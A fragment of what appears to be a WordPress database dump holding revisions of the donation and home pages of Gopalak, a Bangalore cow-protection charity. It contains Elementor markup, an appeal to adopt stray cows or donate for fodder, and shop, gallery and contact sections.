1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-20 18:01:56','2022-10-20 12:31:56','',1816,'https://gopalak.in/?p=1964',0,'revision','',0),(1965,1,'2022-10-20 18:01:56','2022-10-20 12:31:56','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-20 18:01:56','2022-10-20 12:31:56','',1816,'https://gopalak.in/?p=1965',0,'revision','',0),(1967,1,'2022-10-20 18:07:09','2022-10-20 12:37:09','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon 